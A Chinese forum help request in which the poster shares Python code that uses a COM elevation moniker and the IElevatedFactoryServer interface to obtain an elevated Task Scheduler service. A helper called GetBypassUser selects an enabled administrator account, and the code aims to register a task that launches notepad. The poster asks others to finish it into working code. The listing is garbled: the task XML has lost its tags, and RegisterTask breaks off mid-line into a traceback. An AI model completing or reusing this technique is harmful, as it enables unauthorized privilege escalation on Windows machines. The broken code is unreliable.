[Python] 纯文本查看 复制代码# coding=utf-8
import contextlib
import ctypes
import win32api
import windows
import win32ts
import win32net
from windows.generated_def.winstructs import UNICODE_STRING
from ctypes import wintypes
from typing import Optional, List
from windows.generated_def.interfaces import COMInterface, generate_IID, HRESULT, REFIID, POINTER, PVOID, ULONG, \
REFCLSID, DWORD, LPWSTR
# Task Scheduler definition template.  The values (LeastPrivilege, InteractiveToken,
# IgnoreNew, ISO-8601 durations PT10M/PT1H/P3D, a notepad.exe command) read like the
# fields of a Task Scheduler XML document, but no XML element tags are present in this
# listing -- only the [Tr]/[U]/[I] brackets survive -- so, as shown, the literal is
# presumably a rendering artefact rather than a well-formed task definition.
# `{username}` looks like a str.format placeholder filled in by a caller -- confirm;
# nothing in the visible part of the file reads task_xml.
task_xml = r'''
ttt
[Tr]
2024-12-07T09:12:27.509101
true
1
[/Tr]
LeastPrivilege
[U]{username}[/U]
InteractiveToken
IgnoreNew
true
true
true
false
false
[I]
PT10M
PT1H
true
false
[/I]
true
true
false
false
false
P3D
7
notepad.exe
'''
class BIND_OPTS3(ctypes.Structure):
    """ctypes mirror of the Win32 BIND_OPTS3 structure handed to CoGetObject below.

    The caller is expected to zero the struct and set cbStruct to
    sizeof(BIND_OPTS3) before use (see GetElevatedFactoryServerAndTaskService);
    dwClassContext carries the CLSCTX value used for activation.
    """
    _fields_ = [
        ("cbStruct", wintypes.DWORD),            # size of this struct in bytes
        ("grfFlags", wintypes.DWORD),
        ("grfMode", wintypes.DWORD),
        ("dwTickCountDeadline", wintypes.DWORD),
        ("dwTrackFlags", wintypes.DWORD),
        ("dwClassContext", wintypes.DWORD),      # CLSCTX_* activation context
        ("locale", wintypes.LCID),
        ("pServerInfo", ctypes.POINTER(windows.generated_def.winstructs.COSERVERINFO)),
        ("hwnd", wintypes.HWND),
    ]
class IElevatedFactoryServer(COMInterface):
    """COMInterface wrapper for the elevated factory server interface; its vtable
    is described by the `_functions_` table assigned right after this class.

    NOTE(review): the numeric GUID passed to generate_IID (804BD226-AF47-4D71-...)
    is not the same GUID as the `strid` argument (A6BFEA43-501F-...); the latter
    is the GUID that also appears inside the moniker string handed to CoGetObject,
    so one of the two labels is presumably mis-assigned -- confirm before relying
    on `strid` anywhere.
    """
    IID = generate_IID(0x804BD226, 0xAF47, 0x04D71, 0xB4, 0x92, 0x44, 0x3A, 0x57, 0x61, 0x0B, 0x08,
                       name="IElevatedFactoryServer", strid="A6BFEA43-501F-456F-A845-983D3AD7B8F0")
# vtable layout for IElevatedFactoryServer: slots 0-2 are the IUnknown methods,
# slot 3 is the interface's own ServerCreateElevatedObject(rclsid, riid, ppvObject).
# Each entry is a WINFUNCTYPE prototype bound to (slot index, method name).
IElevatedFactoryServer._functions_ = {
    # QueryInterface -> riid:REFIID, ppvObject:**void
    "QueryInterface": ctypes.WINFUNCTYPE(HRESULT, REFIID, POINTER(PVOID))(0, "QueryInterface"),
    # AddRef ->
    "AddRef": ctypes.WINFUNCTYPE(ULONG)(1, "AddRef"),
    # Release ->
    "Release": ctypes.WINFUNCTYPE(ULONG)(2, "Release"),
    # ServerCreateElevatedObject -> rclsid:REFCLSID, riid:REFIID, ppvObject:**void
    "ServerCreateElevatedObject": ctypes.WINFUNCTYPE(HRESULT, REFCLSID, REFIID, POINTER(PVOID))(3,
                                                                                                "ServerCreateElevatedObject"),
}
# ole32!CoGetObject(pszName, pBindOptions, riid, ppv): resolves a display-name
# moniker and stores the requested interface pointer in *ppv.  Bound here with an
# explicit BIND_OPTS3 pointer type so the struct defined above can be passed by
# reference.  Note this is evaluated at import time, so the module only loads on
# Windows (ctypes.windll).
CoGetObject = ctypes.windll.ole32.CoGetObject
CoGetObject.argtypes = [
    wintypes.LPCWSTR,                   # pszName: moniker display name
    ctypes.POINTER(BIND_OPTS3),         # pBindOptions
    REFIID,                             # riid: interface being requested
    ctypes.POINTER(ctypes.c_void_p),    # ppv: receives the interface pointer
]
CoGetObject.restype = HRESULT
class UserUtils:
    """Helpers that pick a local account name from WTS session and local-group data."""

    @classmethod
    def GetBypassUser(cls) -> str:
        """Return the current session's user name when it is an enabled member of
        the local administrators group; otherwise the first enabled member found,
        falling back to the session user.  When no session user can be read at
        all, win32api.GetUserName() is returned instead."""
        sessionUser = cls._GetLoginUser()
        if not sessionUser:
            return win32api.GetUserName()
        enabledAdmins = cls._GetEnabledAdminUsers()
        if sessionUser in enabledAdmins:
            return sessionUser
        return enabledAdmins[0] if enabledAdmins else sessionUser

    @staticmethod
    def _IsUserDisabled(username) -> bool:
        """True when NetUserGetInfo level 1 reports the 0x0002 flag
        (UF_ACCOUNTDISABLE) for *username*.  Any exception raised by the lookup
        is swallowed, in which case the account is reported as not disabled."""
        disabled = False
        with contextlib.suppress(Exception):
            info = win32net.NetUserGetInfo(None, username, 1)
            disabled = bool(info['flags'] & 0x0002)
        return disabled

    @staticmethod
    def _GetEnabledAdminUsers() -> List:
        """Names of members of the local "administrators" group that are not
        disabled.  The resume handle returned by NetLocalGroupGetMembers is
        discarded, so only the first batch is examined; an exception part-way
        through is swallowed and whatever names were collected so far are
        returned."""
        names = []
        with contextlib.suppress(Exception):
            members, _total, _resume = win32net.NetLocalGroupGetMembers(None, "administrators", 1, 0, 4096)
            for entry in members:
                candidate = entry['name']
                if not UserUtils._IsUserDisabled(candidate):
                    names.append(candidate)
        return names

    @staticmethod
    def _GetLoginUser() -> Optional[str]:
        """User name of the current WTS session (WTSQuerySessionInformationW with
        WTSUserName), or None when the call reports failure (return value 0).
        NOTE(review): the buffer the API allocates is never handed to
        WTSFreeMemory, so each call leaks it."""
        nameBuf = LPWSTR()
        nameLen = DWORD(0)
        ok = ctypes.windll.wtsapi32.WTSQuerySessionInformationW(
            win32ts.WTS_CURRENT_SERVER_HANDLE,
            win32ts.WTS_CURRENT_SESSION,
            win32ts.WTSUserName,
            ctypes.byref(nameBuf),
            ctypes.byref(nameLen),
        )
        return None if ok == 0 else nameBuf.value
def GetElevatedFactoryServerAndTaskService(iElevatedFactoryServer: IElevatedFactoryServer,
                                           iTaskService: windows.generated_def.interfaces.ITaskService) -> bool:
    """Activate the elevated factory server through a COM elevation moniker, then
    ask it for an ITaskService instance.

    Args:
        iElevatedFactoryServer: out-parameter; receives the factory interface
            pointer (written in place through ctypes.byref).
        iTaskService: out-parameter; receives the ITaskService pointer the same way.

    Returns:
        True only when both CoGetObject and ServerCreateElevatedObject returned
        S_OK and a non-NULL pointer; False otherwise.  When the second step fails
        the already-obtained iElevatedFactoryServer is not Released here.

    NOTE(review): "Elevation:Administrator!new:{CLSID}" is the COM elevation
    moniker syntax, i.e. an explicit request for an elevated out-of-process
    instance of that class; this is the activation path UAC mediates (the post
    itself notes a consent dialog may appear when running).
    """
    # Same GUID as IElevatedFactoryServer.IID above, rebuilt as a windows.com IID
    # so it can be passed by reference as the riid argument.
    IID_ElevatedFactoryServer = windows.com.IID.from_raw(0x804BD226, 0xAF47, 0x04D71, 0xB4, 0x92, 0x44, 0x3A, 0x57,
                                                         0x61, 0x0B,
                                                         0x08)
    # Zero the bind options so every field not set below (flags, mode, deadline,
    # pServerInfo, hwnd) is 0/NULL, then fill in the two fields the call needs.
    bop = BIND_OPTS3()
    ctypes.memset(ctypes.pointer(bop), 0, ctypes.sizeof(BIND_OPTS3))
    bop.cbStruct = ctypes.sizeof(BIND_OPTS3)  # struct size identifies the BIND_OPTS version
    bop.dwClassContext = windows.generated_def.CLSCTX_LOCAL_SERVER
    szMoniker = ctypes.create_unicode_buffer("Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}")
    hr = CoGetObject(szMoniker, ctypes.byref(bop), ctypes.byref(IID_ElevatedFactoryServer),
                     ctypes.byref(iElevatedFactoryServer))
    if hr != windows.generated_def.S_OK:
        return False
    if not iElevatedFactoryServer.value:
        return False
    print("[+] CoGetObject Success")
    # GUIDs as named by the locals: the Task Scheduler class and the ITaskService interface.
    CLSID_TaskScheduler = windows.com.IID.from_string("0F87369F-A4E5-4CFC-BD3E-73E6154572DD")
    IID_ITaskService = windows.com.IID.from_string("2FABA4C7-4DA9-4013-9697-20CC3FD40F85")
    # vtable slot 3 of the factory (see IElevatedFactoryServer._functions_): create
    # the requested class and hand back the requested interface.
    hr = iElevatedFactoryServer.ServerCreateElevatedObject(ctypes.byref(CLSID_TaskScheduler),
                                                           ctypes.byref(IID_ITaskService),
                                                           ctypes.byref(iTaskService))
    if hr != windows.generated_def.S_OK:
        return False
    if not iTaskService.value:
        return False
    return True
def RegisterTask(taskService: windows.generated_def.interfaces.ITaskService, taskName: str, description: str,
username: str, command: str, arguments: Optional[str] = None):
varDummy = windows.generated_def.VARIANT()
hr = taskService.Connect(varDummy, varDummy, varDummy, varDummy)
if hr
报错为
[+] CoGetObject Success
[+] GetElevatedFactoryServerAndTaskService Success
File "D:/test.py", line 226, in RegisterTask
windows.generated_def.TASK_LOGON_INTERACTIVE_TOKEN, name, ctypes.byref(pTask))
OSError: exception: access violation reading 0x00000250B714FFF0
如果成功将创建一个名为test的计划任务,并且弹出记事本。我必须使用这个函数的 pTaskFolder.
RegisterTask
,求能完整通过的代码,吾爱币不够可以再加,运行的时候可能会弹出uac框,需要点击“是”